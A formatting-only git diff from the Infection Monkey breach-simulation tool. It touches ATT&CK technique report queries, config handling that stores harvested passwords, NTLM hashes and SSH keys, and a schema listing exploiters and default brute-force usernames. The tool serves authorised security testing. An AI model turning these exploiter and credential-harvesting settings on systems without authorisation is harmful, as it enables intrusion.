--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1156.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1156.py
@@ -17,25 +17,25 @@ class T1156(PostBreachTechnique):
def get_pba_query(*args):
return [
{
- "$match": {
- "telem_category": "post_breach",
- "data.name": POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION,
+ "$match":{
+ "telem_category":"post_breach",
+ "data.name":POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION,
}
},
{
- "$project": {
- "_id": 0,
- "machine": {
- "hostname": {"$arrayElemAt": ["$data.hostname", 0]},
- "ips": [{"$arrayElemAt": ["$data.ip", 0]}],
+ "$project":{
+ "_id":0,
+ "machine":{
+ "hostname":{"$arrayElemAt":["$data.hostname", 0]},
+ "ips":[{"$arrayElemAt":["$data.ip", 0]}],
},
- "result": "$data.result",
+ "result":"$data.result",
}
},
- {"$unwind": "$result"},
+ {"$unwind":"$result"},
{
- "$match": {
- "$or": [{"result": {"$regex": r"\.bash"}}, {"result": {"$regex": r"\.profile"}}]
+ "$match":{
+ "$or":[{"result":{"$regex":r"\.bash"}}, {"result":{"$regex":r"\.profile"}}]
}
},
]
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1166.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1166.py
index ab482f0f6..4ed2375a5 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1166.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1166.py
@@ -6,7 +6,10 @@ __author__ = "shreyamalviya"
class T1166(PostBreachTechnique):
tech_id = "T1166"
- unscanned_msg = "Monkey didn't try setting the setuid or setgid bits since it didn't run on any Linux machines."
+ unscanned_msg = (
+ "Monkey didn't try setting the setuid or setgid bits since it didn't run on "
+ "any Linux machines."
+ )
scanned_msg = "Monkey tried setting the setuid or setgid bits but failed."
used_msg = "Monkey successfully set the setuid or setgid bits."
pba_names = [POST_BREACH_SETUID_SETGID]
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py
index 473e2b9df..b4ea47ada 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py
@@ -25,11 +25,11 @@ class T1188(AttackTechnique):
proxy = proxy.tunnel
if proxy_count > 1:
hops.append(
- {
- "from": initial.get_network_info(),
- "to": proxy.get_network_info(),
- "count": proxy_count,
- }
+ {
+ "from":initial.get_network_info(),
+ "to":proxy.get_network_info(),
+ "count":proxy_count,
+ }
)
status = ScanStatus.USED.value if hops else ScanStatus.UNSCANNED.value
return (status, hops)
@@ -37,5 +37,5 @@ class T1188(AttackTechnique):
status, hops = get_technique_status_and_data()
data = T1188.get_base_data_by_status(status)
- data.update({"hops": hops})
+ data.update({"hops":hops})
return data
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1197.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1197.py
index be1b669f6..eb71840ef 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1197.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1197.py
@@ -16,19 +16,19 @@ class T1197(AttackTechnique):
def get_report_data():
data = T1197.get_tech_base_data()
bits_results = mongo.db.telemetry.aggregate(
- [
- {"$match": {"telem_category": "attack", "data.technique": T1197.tech_id}},
- {
- "$group": {
- "_id": {"ip_addr": "$data.machine.ip_addr", "usage": "$data.usage"},
- "ip_addr": {"$first": "$data.machine.ip_addr"},
- "domain_name": {"$first": "$data.machine.domain_name"},
- "usage": {"$first": "$data.usage"},
- "time": {"$first": "$timestamp"},
- }
- },
- ]
+ [
+ {"$match":{"telem_category":"attack", "data.technique":T1197.tech_id}},
+ {
+ "$group":{
+ "_id":{"ip_addr":"$data.machine.ip_addr", "usage":"$data.usage"},
+ "ip_addr":{"$first":"$data.machine.ip_addr"},
+ "domain_name":{"$first":"$data.machine.domain_name"},
+ "usage":{"$first":"$data.usage"},
+ "time":{"$first":"$timestamp"},
+ }
+ },
+ ]
)
bits_results = list(bits_results)
- data.update({"bits_jobs": bits_results})
+ data.update({"bits_jobs":bits_results})
return data
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py
index 9d4a17bf5..140697b7f 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1210.py
@@ -35,45 +35,45 @@ class T1210(AttackTechnique):
scanned_services, exploited_services = [], []
else:
scanned_services, exploited_services = status_and_data[1], status_and_data[2]
- data = {"title": T1210.technique_title()}
+ data = {"title":T1210.technique_title()}
data.update(T1210.get_message_and_status(status))
data.update(T1210.get_mitigation_by_status(status))
data.update(
- {"scanned_services": scanned_services, "exploited_services": exploited_services}
+ {"scanned_services":scanned_services, "exploited_services":exploited_services}
)
return data
@staticmethod
def get_scanned_services():
results = mongo.db.telemetry.aggregate(
- [
- {"$match": {"telem_category": "scan"}},
- {"$sort": {"data.service_count": -1}},
- {
- "$group": {
- "_id": {"ip_addr": "$data.machine.ip_addr"},
- "machine": {"$first": "$data.machine"},
- "time": {"$first": "$timestamp"},
- }
- },
- ]
+ [
+ {"$match":{"telem_category":"scan"}},
+ {"$sort":{"data.service_count":-1}},
+ {
+ "$group":{
+ "_id":{"ip_addr":"$data.machine.ip_addr"},
+ "machine":{"$first":"$data.machine"},
+ "time":{"$first":"$timestamp"},
+ }
+ },
+ ]
)
return list(results)
@staticmethod
def get_exploited_services():
results = mongo.db.telemetry.aggregate(
- [
- {"$match": {"telem_category": "exploit", "data.result": True}},
- {
- "$group": {
- "_id": {"ip_addr": "$data.machine.ip_addr"},
- "service": {"$first": "$data.info"},
- "machine": {"$first": "$data.machine"},
- "time": {"$first": "$timestamp"},
- }
- },
- ]
+ [
+ {"$match":{"telem_category":"exploit", "data.result":True}},
+ {
+ "$group":{
+ "_id":{"ip_addr":"$data.machine.ip_addr"},
+ "service":{"$first":"$data.info"},
+ "machine":{"$first":"$data.machine"},
+ "time":{"$first":"$timestamp"},
+ }
+ },
+ ]
)
return list(results)
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py
index 6ed73765a..06dd6b253 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py
@@ -7,20 +7,23 @@ __author__ = "shreyamalviya"
class T1216(PostBreachTechnique):
tech_id = "T1216"
unscanned_msg = (
- "Monkey didn't attempt to execute an arbitrary program with the help of a "
- + "pre-existing signed script since it didn't run on any Windows machines. "
- + "If successful, this behavior could be abused by adversaries to execute malicious files that could "
- + "bypass application control and signature validation on systems."
+ "Monkey didn't attempt to execute an arbitrary program with the help of a "
+ + "pre-existing signed script since it didn't run on any Windows machines. "
+ + "If successful, this behavior could be abused by adversaries to execute malicious "
+ "files that could " + "bypass application control and signature validation on "
+ "systems."
)
scanned_msg = (
- "Monkey attempted to execute an arbitrary program with the help of a "
- + "pre-existing signed script on Windows but failed. "
- + "If successful, this behavior could be abused by adversaries to execute malicious files that could "
- + "bypass application control and signature validation on systems."
+ "Monkey attempted to execute an arbitrary program with the help of a "
+ + "pre-existing signed script on Windows but failed. "
+ + "If successful, this behavior could be abused by adversaries to execute malicious "
+ "files that could " + "bypass application control and signature validation on "
+ "systems."
)
used_msg = (
- "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows. "
- + "This behavior could be abused by adversaries to execute malicious files that could "
- + "bypass application control and signature validation on systems."
+ "Monkey executed an arbitrary program with the help of a pre-existing signed script "
+ "on Windows. "
+ + "This behavior could be abused by adversaries to execute malicious files that could "
+ + "bypass application control and signature validation on systems."
)
pba_names = [POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC]
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1222.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1222.py
index 3a6ba6f97..6af595d99 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1222.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1222.py
@@ -13,26 +13,26 @@ class T1222(AttackTechnique):
query = [
{
- "$match": {
- "telem_category": "attack",
- "data.technique": "T1222",
- "data.status": ScanStatus.USED.value,
+ "$match":{
+ "telem_category":"attack",
+ "data.technique":"T1222",
+ "data.status":ScanStatus.USED.value,
}
},
{
- "$group": {
- "_id": {
- "machine": "$data.machine",
- "status": "$data.status",
- "command": "$data.command",
+ "$group":{
+ "_id":{
+ "machine":"$data.machine",
+ "status":"$data.status",
+ "command":"$data.command",
}
}
},
- {"$replaceRoot": {"newRoot": "$_id"}},
+ {"$replaceRoot":{"newRoot":"$_id"}},
]
@staticmethod
def get_report_data():
data = T1222.get_tech_base_data()
- data.update({"commands": list(mongo.db.telemetry.aggregate(T1222.query))})
+ data.update({"commands":list(mongo.db.telemetry.aggregate(T1222.query))})
return data
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1504.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1504.py
index d348c921b..c2c342ea2 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/T1504.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1504.py
@@ -6,7 +6,10 @@ __author__ = "shreyamalviya"
class T1504(PostBreachTechnique):
tech_id = "T1504"
- unscanned_msg = "Monkey didn't try modifying powershell startup files since it didn't run on any Windows machines."
+ unscanned_msg = (
+ "Monkey didn't try modifying powershell startup files since it didn't run on "
+ "any Windows machines."
+ )
scanned_msg = "Monkey tried modifying powershell startup files but failed."
used_msg = "Monkey successfully modified powershell startup files."
pba_names = [POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION]
@@ -15,21 +18,21 @@ class T1504(PostBreachTechnique):
def get_pba_query(*args):
return [
{
- "$match": {
- "telem_category": "post_breach",
- "data.name": POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION,
+ "$match":{
+ "telem_category":"post_breach",
+ "data.name":POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION,
}
},
{
- "$project": {
- "_id": 0,
- "machine": {
- "hostname": {"$arrayElemAt": ["$data.hostname", 0]},
- "ips": [{"$arrayElemAt": ["$data.ip", 0]}],
+ "$project":{
+ "_id":0,
+ "machine":{
+ "hostname":{"$arrayElemAt":["$data.hostname", 0]},
+ "ips":[{"$arrayElemAt":["$data.ip", 0]}],
},
- "result": "$data.result",
+ "result":"$data.result",
}
},
- {"$unwind": "$result"},
- {"$match": {"result": {"$regex": r"profile\.ps1"}}},
+ {"$unwind":"$result"},
+ {"$match":{"result":{"$regex":r"profile\.ps1"}}},
]
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/__init__.py b/monkey/monkey_island/cc/services/attack/technique_reports/__init__.py
index 7cdf9010c..b33263482 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/__init__.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/__init__.py
@@ -9,10 +9,9 @@ from monkey_island.cc.services.attack.attack_config import AttackConfig
logger = logging.getLogger(__name__)
-
disabled_msg = (
- "This technique has been disabled. "
- + "You can enable it from the [configuration page](../../configure)."
+ "This technique has been disabled. "
+ + "You can enable it from the [configuration page](../../configure)."
)
@@ -68,19 +67,19 @@ class AttackTechnique(object, metaclass=abc.ABCMeta):
if not cls._is_enabled_in_config():
return ScanStatus.DISABLED.value
elif mongo.db.telemetry.find_one(
- {
- "telem_category": "attack",
- "data.status": ScanStatus.USED.value,
- "data.technique": cls.tech_id,
- }
+ {
+ "telem_category":"attack",
+ "data.status":ScanStatus.USED.value,
+ "data.technique":cls.tech_id,
+ }
):
return ScanStatus.USED.value
elif mongo.db.telemetry.find_one(
- {
- "telem_category": "attack",
- "data.status": ScanStatus.SCANNED.value,
- "data.technique": cls.tech_id,
- }
+ {
+ "telem_category":"attack",
+ "data.status":ScanStatus.SCANNED.value,
+ "data.technique":cls.tech_id,
+ }
):
return ScanStatus.SCANNED.value
else:
@@ -93,7 +92,7 @@ class AttackTechnique(object, metaclass=abc.ABCMeta):
:param status: Enum from common/attack_utils.py integer value
:return: Dict with message and status
"""
- return {"message": cls.get_message_by_status(status), "status": status}
+ return {"message":cls.get_message_by_status(status), "status":status}
@classmethod
def get_message_by_status(cls, status):
@@ -122,13 +121,14 @@ class AttackTechnique(object, metaclass=abc.ABCMeta):
def get_tech_base_data(cls):
"""
Gathers basic attack technique data into a dict.
- :return: dict E.g. {'message': 'Brute force used', 'status': 2, 'title': 'T1110 Brute force'}
+ :return: dict E.g. {'message': 'Brute force used', 'status': 2, 'title': 'T1110 Brute
+ force'}
"""
data = {}
status = cls.technique_status()
title = cls.technique_title()
data.update(
- {"status": status, "title": title, "message": cls.get_message_by_status(status)}
+ {"status":status, "title":title, "message":cls.get_message_by_status(status)}
)
data.update(cls.get_mitigation_by_status(status))
return data
@@ -136,7 +136,7 @@ class AttackTechnique(object, metaclass=abc.ABCMeta):
@classmethod
def get_base_data_by_status(cls, status):
data = cls.get_message_and_status(status)
- data.update({"title": cls.technique_title()})
+ data.update({"title":cls.technique_title()})
data.update(cls.get_mitigation_by_status(status))
return data
@@ -144,7 +144,7 @@ class AttackTechnique(object, metaclass=abc.ABCMeta):
def get_mitigation_by_status(cls, status: ScanStatus) -> dict:
if status == ScanStatus.USED.value:
mitigation_document = AttackMitigations.get_mitigation_by_technique_id(str(cls.tech_id))
- return {"mitigations": mitigation_document.to_mongo().to_dict()["mitigations"]}
+ return {"mitigations":mitigation_document.to_mongo().to_dict()["mitigations"]}
else:
return {}
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/pba_technique.py b/monkey/monkey_island/cc/services/attack/technique_reports/pba_technique.py
index 1366f0d3a..205909573 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/pba_technique.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/pba_technique.py
@@ -20,23 +20,24 @@ class PostBreachTechnique(AttackTechnique, metaclass=abc.ABCMeta):
@classmethod
def get_pba_query(cls, post_breach_action_names):
"""
- :param post_breach_action_names: Names of post-breach actions with which the technique is associated
+ :param post_breach_action_names: Names of post-breach actions with which the technique is
+ associated
(example - `["Communicate as new user", "Backdoor user"]` for T1136)
:return: Mongo query that parses attack telemetries for a simple report component
(gets machines and post-breach action usage).
"""
return [
{
- "$match": {
- "telem_category": "post_breach",
- "$or": [{"data.name": pba_name} for pba_name in post_breach_action_names],
+ "$match":{
+ "telem_category":"post_breach",
+ "$or":[{"data.name":pba_name} for pba_name in post_breach_action_names],
}
},
{
- "$project": {
- "_id": 0,
- "machine": {"hostname": "$data.hostname", "ips": ["$data.ip"]},
- "result": "$data.result",
+ "$project":{
+ "_id":0,
+ "machine":{"hostname":"$data.hostname", "ips":["$data.ip"]},
+ "result":"$data.result",
}
},
]
@@ -53,17 +54,17 @@ class PostBreachTechnique(AttackTechnique, metaclass=abc.ABCMeta):
status = ScanStatus.UNSCANNED.value
if info:
successful_PBAs = mongo.db.telemetry.count(
- {
- "$or": [{"data.name": pba_name} for pba_name in cls.pba_names],
- "data.result.1": True,
- }
+ {
+ "$or":[{"data.name":pba_name} for pba_name in cls.pba_names],
+ "data.result.1":True,
+ }
)
status = ScanStatus.USED.value if successful_PBAs else ScanStatus.SCANNED.value
return (status, info)
- data = {"title": cls.technique_title()}
+ data = {"title":cls.technique_title()}
status, info = get_technique_status_and_data()
data.update(cls.get_base_data_by_status(status))
- data.update({"info": info})
+ data.update({"info":info})
return data
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/technique_report_tools.py b/monkey/monkey_island/cc/services/attack/technique_reports/technique_report_tools.py
index 0a9a1045b..16ab5bf35 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/technique_report_tools.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/technique_report_tools.py
@@ -9,10 +9,10 @@ def parse_creds(attempt):
"""
username = attempt["user"]
creds = {
- "lm_hash": {"type": "LM hash", "output": censor_hash(attempt["lm_hash"])},
- "ntlm_hash": {"type": "NTLM hash", "output": censor_hash(attempt["ntlm_hash"], 20)},
- "ssh_key": {"type": "SSH key", "output": attempt["ssh_key"]},
- "password": {"type": "Plaintext password", "output": censor_password(attempt["password"])},
+ "lm_hash":{"type":"LM hash", "output":censor_hash(attempt["lm_hash"])},
+ "ntlm_hash":{"type":"NTLM hash", "output":censor_hash(attempt["ntlm_hash"], 20)},
+ "ssh_key":{"type":"SSH key", "output":attempt["ssh_key"]},
+ "password":{"type":"Plaintext password", "output":censor_password(attempt["password"])},
}
for key, cred in list(creds.items()):
if attempt[key]:
diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/usage_technique.py b/monkey/monkey_island/cc/services/attack/technique_reports/usage_technique.py
index bfa406b96..80f70010b 100644
--- a/monkey/monkey_island/cc/services/attack/technique_reports/usage_technique.py
+++ b/monkey/monkey_island/cc/services/attack/technique_reports/usage_technique.py
@@ -17,8 +17,8 @@ class UsageTechnique(AttackTechnique, metaclass=abc.ABCMeta):
usage["usage"] = UsageEnum[usage["usage"]].value[usage["status"]]
except KeyError:
logger.error(
- "Error translating usage enum. into string. "
- "Check if usage enum field exists and covers all telem. statuses."
+ "Error translating usage enum. into string. "
+ "Check if usage enum field exists and covers all telem. statuses."
)
return usage
@@ -38,29 +38,29 @@ class UsageTechnique(AttackTechnique, metaclass=abc.ABCMeta):
(gets machines and attack technique usage).
"""
return [
- {"$match": {"telem_category": "attack", "data.technique": cls.tech_id}},
+ {"$match":{"telem_category":"attack", "data.technique":cls.tech_id}},
{
- "$lookup": {
- "from": "monkey",
- "localField": "monkey_guid",
- "foreignField": "guid",
- "as": "monkey",
+ "$lookup":{
+ "from":"monkey",
+ "localField":"monkey_guid",
+ "foreignField":"guid",
+ "as":"monkey",
}
},
{
- "$project": {
- "monkey": {"$arrayElemAt": ["$monkey", 0]},
- "status": "$data.status",
- "usage": "$data.usage",
+ "$project":{
+ "monkey":{"$arrayElemAt":["$monkey", 0]},
+ "status":"$data.status",
+ "usage":"$data.usage",
}
},
{
- "$addFields": {
- "_id": 0,
- "machine": {"hostname": "$monkey.hostname", "ips": "$monkey.ip_addresses"},
- "monkey": 0,
+ "$addFields":{
+ "_id":0,
+ "machine":{"hostname":"$monkey.hostname", "ips":"$monkey.ip_addresses"},
+ "monkey":0,
}
},
- {"$group": {"_id": {"machine": "$machine", "status": "$status", "usage": "$usage"}}},
- {"$replaceRoot": {"newRoot": "$_id"}},
+ {"$group":{"_id":{"machine":"$machine", "status":"$status", "usage":"$usage"}}},
+ {"$replaceRoot":{"newRoot":"$_id"}},
]
diff --git a/monkey/monkey_island/cc/services/bootloader.py b/monkey/monkey_island/cc/services/bootloader.py
index 05bdac8f1..b295b9c58 100644
--- a/monkey/monkey_island/cc/services/bootloader.py
+++ b/monkey/monkey_island/cc/services/bootloader.py
@@ -19,7 +19,7 @@ class BootloaderService:
telem["os_version"] = "Unknown OS"
telem_id = BootloaderService.get_mongo_id_for_bootloader_telem(telem)
- mongo.db.bootloader_telems.update({"_id": telem_id}, {"$setOnInsert": telem}, upsert=True)
+ mongo.db.bootloader_telems.update({"_id":telem_id}, {"$setOnInsert":telem}, upsert=True)
will_monkey_run = BootloaderService.is_os_compatible(telem)
try:
diff --git a/monkey/monkey_island/cc/services/bootloader_test.py b/monkey/monkey_island/cc/services/bootloader_test.py
index 81c4affff..b8cb3adc6 100644
--- a/monkey/monkey_island/cc/services/bootloader_test.py
+++ b/monkey/monkey_island/cc/services/bootloader_test.py
@@ -3,14 +3,14 @@ from unittest import TestCase
from monkey_island.cc.services.bootloader import BootloaderService
WINDOWS_VERSIONS = {
- "5.0": "Windows 2000",
- "5.1": "Windows XP",
- "5.2": "Windows XP/server 2003",
- "6.0": "Windows Vista/server 2008",
- "6.1": "Windows 7/server 2008R2",
- "6.2": "Windows 8/server 2012",
- "6.3": "Windows 8.1/server 2012R2",
- "10.0": "Windows 10/server 2016-2019",
+ "5.0":"Windows 2000",
+ "5.1":"Windows XP",
+ "5.2":"Windows XP/server 2003",
+ "6.0":"Windows Vista/server 2008",
+ "6.1":"Windows 7/server 2008R2",
+ "6.2":"Windows 8/server 2012",
+ "6.3":"Windows 8.1/server 2012R2",
+ "10.0":"Windows 10/server 2016-2019",
}
MIN_GLIBC_VERSION = 2.14
@@ -23,10 +23,10 @@ class TestBootloaderService(TestCase):
str3 = "ldd (GNU libc) 2.28"
str4 = "ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23"
self.assertTrue(
- not BootloaderService.is_glibc_supported(str1)
- and not BootloaderService.is_glibc_supported(str2)
- and BootloaderService.is_glibc_supported(str3)
- and BootloaderService.is_glibc_supported(str4)
+ not BootloaderService.is_glibc_supported(str1)
+ and not BootloaderService.is_glibc_supported(str2)
+ and BootloaderService.is_glibc_supported(str3)
+ and BootloaderService.is_glibc_supported(str4)
)
def test_remove_local_ips(self):
diff --git a/monkey/monkey_island/cc/services/config.py b/monkey/monkey_island/cc/services/config.py
index d6fe0a3cb..9c7b259e4 100644
--- a/monkey/monkey_island/cc/services/config.py
+++ b/monkey/monkey_island/cc/services/config.py
@@ -49,14 +49,16 @@ class ConfigService:
def get_config(is_initial_config=False, should_decrypt=True, is_island=False):
"""
Gets the entire global config.
- :param is_initial_config: If True, the initial config will be returned instead of the current config.
- :param should_decrypt: If True, all config values which are set as encrypted will be decrypted.
+ :param is_initial_config: If True, the initial config will be returned instead of the
+ current config.
+ :param should_decrypt: If True, all config values which are set as encrypted will be
+ decrypted.
:param is_island: If True, will include island specific configuration parameters.
:return: The entire global config.
"""
config = (
- mongo.db.config.find_one({"name": "initial" if is_initial_config else "newconfig"})
- or {}
+ mongo.db.config.find_one({"name":"initial" if is_initial_config else "newconfig"})
+ or {}
)
for field in ("name", "_id"):
config.pop(field, None)
@@ -70,15 +72,17 @@ class ConfigService:
def get_config_value(config_key_as_arr, is_initial_config=False, should_decrypt=True):
"""
Get a specific config value.
- :param config_key_as_arr: The config key as an array. e.g. ['basic', 'credentials', 'exploit_password_list'].
- :param is_initial_config: If True, returns the value of the initial config instead of the current config.
+ :param config_key_as_arr: The config key as an array. e.g. ['basic', 'credentials',
+ 'exploit_password_list'].
+ :param is_initial_config: If True, returns the value of the initial config instead of the
+ current config.
:param should_decrypt: If True, the value of the config key will be decrypted
(if it's in the list of encrypted config values).
:return: The value of the requested config key.
"""
- config_key = functools.reduce(lambda x, y: x + "." + y, config_key_as_arr)
+ config_key = functools.reduce(lambda x, y:x + "." + y, config_key_as_arr)
config = mongo.db.config.find_one(
- {"name": "initial" if is_initial_config else "newconfig"}, {config_key: 1}
+ {"name":"initial" if is_initial_config else "newconfig"}, {config_key:1}
)
for config_key_part in config_key_as_arr:
config = config[config_key_part]
@@ -93,7 +97,7 @@ class ConfigService:
@staticmethod
def set_config_value(config_key_as_arr, value):
mongo_key = ".".join(config_key_as_arr)
- mongo.db.config.update({"name": "newconfig"}, {"$set": {mongo_key: value}})
+ mongo.db.config.update({"name":"newconfig"}, {"$set":{mongo_key:value}})
@staticmethod
def get_flat_config(is_initial_config=False, should_decrypt=True):
@@ -123,47 +127,47 @@ class ConfigService:
if should_encrypt:
item_value = get_encryptor().enc(item_value)
mongo.db.config.update(
- {"name": "newconfig"}, {"$addToSet": {item_key: item_value}}, upsert=False
+ {"name":"newconfig"}, {"$addToSet":{item_key:item_value}}, upsert=False
)
mongo.db.monkey.update(
- {}, {"$addToSet": {"config." + item_key.split(".")[-1]: item_value}}, multi=True
+ {}, {"$addToSet":{"config." + item_key.split(".")[-1]:item_value}}, multi=True
)
@staticmethod
def creds_add_username(username):
ConfigService.add_item_to_config_set_if_dont_exist(
- USER_LIST_PATH, username, should_encrypt=False
+ USER_LIST_PATH, username, should_encrypt=False
)
@staticmethod
def creds_add_password(password):
ConfigService.add_item_to_config_set_if_dont_exist(
- PASSWORD_LIST_PATH, password, should_encrypt=True
+ PASSWORD_LIST_PATH, password, should_encrypt=True
)
@staticmethod
def creds_add_lm_hash(lm_hash):
ConfigService.add_item_to_config_set_if_dont_exist(
- LM_HASH_LIST_PATH, lm_hash, should_encrypt=True
+ LM_HASH_LIST_PATH, lm_hash, should_encrypt=True
)
@staticmethod
def creds_add_ntlm_hash(ntlm_hash):
ConfigService.add_item_to_config_set_if_dont_exist(
- NTLM_HASH_LIST_PATH, ntlm_hash, should_encrypt=True
+ NTLM_HASH_LIST_PATH, ntlm_hash, should_encrypt=True
)
@staticmethod
def ssh_add_keys(public_key, private_key, user, ip):
if not ConfigService.ssh_key_exists(
- ConfigService.get_config_value(SSH_KEYS_PATH, False, False), user, ip
+ ConfigService.get_config_value(SSH_KEYS_PATH, False, False), user, ip
):
ConfigService.add_item_to_config_set_if_dont_exist(
- SSH_KEYS_PATH,
- {"public_key": public_key, "private_key": private_key, "user": user, "ip": ip},
- # SSH keys already encrypted in process_ssh_info()
- should_encrypt=False,
+ SSH_KEYS_PATH,
+ {"public_key":public_key, "private_key":private_key, "user":user, "ip":ip},
+ # SSH keys already encrypted in process_ssh_info()
+ should_encrypt=False,
)
@staticmethod
@@ -173,7 +177,7 @@ class ConfigService:
def _filter_none_values(data):
if isinstance(data, dict):
return {
- k: ConfigService._filter_none_values(v)
+ k:ConfigService._filter_none_values(v)
for k, v in data.items()
if k is not None and v is not None
}
@@ -184,7 +188,8 @@ class ConfigService:
@staticmethod
def update_config(config_json, should_encrypt):
- # PBA file upload happens on pba_file_upload endpoint and corresponding config options are set there
+ # PBA file upload happens on pba_file_upload endpoint and corresponding config options
+ # are set there
config_json = ConfigService._filter_none_values(config_json)
monkey_island.cc.services.post_breach_files.set_config_PBA_files(config_json)
if should_encrypt:
@@ -193,7 +198,7 @@ class ConfigService:
except KeyError:
logger.error("Bad configuration file was submitted.")
return False
- mongo.db.config.update({"name": "newconfig"}, {"$set": config_json}, upsert=True)
+ mongo.db.config.update({"name":"newconfig"}, {"$set":config_json}, upsert=True)
logger.info("monkey config was updated")
return True
@@ -201,7 +206,7 @@ class ConfigService:
def init_default_config():
if ConfigService.default_config is None:
default_validating_draft4_validator = ConfigService._extend_config_with_default(
- Draft4Validator
+ Draft4Validator
)
config = {}
default_validating_draft4_validator(SCHEMA).validate(config)
@@ -243,10 +248,10 @@ class ConfigService:
@staticmethod
def save_initial_config_if_needed():
- if mongo.db.config.find_one({"name": "initial"}) is not None:
+ if mongo.db.config.find_one({"name":"initial"}) is not None:
return
- initial_config = mongo.db.config.find_one({"name": "newconfig"})
+ initial_config = mongo.db.config.find_one({"name":"newconfig"})
initial_config["name"] = "initial"
initial_config.pop("_id")
mongo.db.config.insert(initial_config)
@@ -272,9 +277,9 @@ class ConfigService:
for property4, subschema4 in list(subschema3["properties"].items()):
if "properties" in subschema4:
raise ValueError(
- "monkey/monkey_island/cc/services/config.py "
- "can't handle 5 level config. "
- "Either change back the config or refactor."
+ "monkey/monkey_island/cc/services/config.py "
+ "can't handle 5 level config. "
+ "Either change back the config or refactor."
)
if "default" in subschema4:
layer_3_dict[property4] = subschema4["default"]
@@ -286,8 +291,8 @@ class ConfigService:
yield error
return validators.extend(
- validator_class,
- {"properties": set_defaults},
+ validator_class,
+ {"properties":set_defaults},
)
@staticmethod
@@ -307,13 +312,13 @@ class ConfigService:
for key in keys:
if isinstance(flat_config[key], collections.Sequence) and not isinstance(
- flat_config[key], str
+ flat_config[key], str
):
# Check if we are decrypting ssh key pair
if (
- flat_config[key]
- and isinstance(flat_config[key][0], dict)
- and "public_key" in flat_config[key][0]
+ flat_config[key]
+ and isinstance(flat_config[key][0], dict)
+ and "public_key" in flat_config[key][0]
):
flat_config[key] = [
ConfigService.decrypt_ssh_key_pair(item) for item in flat_config[key]
@@ -330,7 +335,8 @@ class ConfigService:
config_arr = config
parent_config_arr = None
- # Because the config isn't flat, this for-loop gets the actual config value out of the config
+ # Because the config isn't flat, this for-loop gets the actual config value out of
+ # the config
for config_key_part in config_arr_as_array:
parent_config_arr = config_arr
config_arr = config_arr[config_key_part]
diff --git a/monkey/monkey_island/cc/services/config_schema/basic.py b/monkey/monkey_island/cc/services/config_schema/basic.py
index aaf2e570e..b016e435e 100644
--- a/monkey/monkey_island/cc/services/config_schema/basic.py
+++ b/monkey/monkey_island/cc/services/config_schema/basic.py
@@ -1,19 +1,19 @@
BASIC = {
- "title": "Exploits",
- "type": "object",
- "primary": True,
- "properties": {
- "exploiters": {
- "title": "Exploiters",
- "type": "object",
- "description": "Choose which exploiters the Monkey will attempt.",
- "properties": {
- "exploiter_classes": {
- "title": "Exploiters",
- "type": "array",
- "uniqueItems": True,
- "items": {"$ref": "#/definitions/exploiter_classes"},
- "default": [
+ "title":"Exploits",
+ "type":"object",
+ "primary":True,
+ "properties":{
+ "exploiters":{
+ "title":"Exploiters",
+ "type":"object",
+ "description":"Choose which exploiters the Monkey will attempt.",
+ "properties":{
+ "exploiter_classes":{
+ "title":"Exploiters",
+ "type":"array",
+ "uniqueItems":True,
+ "items":{"$ref":"#/definitions/exploiter_classes"},
+ "default":[
"SmbExploiter",
"WmiExploiter",
"SSHExploiter",
@@ -30,25 +30,26 @@ BASIC = {
}
},
},
- "credentials": {
- "title": "Credentials",
- "type": "object",
- "properties": {
- "exploit_user_list": {
- "title": "Exploit user list",
- "type": "array",
- "uniqueItems": True,
- "items": {"type": "string"},
- "default": ["Administrator", "root", "user"],
- "description": "List of user names that will be used by exploiters that need credentials, like "
- "SSH brute-forcing.",
+ "credentials":{
+ "title":"Credentials",
+ "type":"object",
+ "properties":{
+ "exploit_user_list":{
+ "title":"Exploit user list",
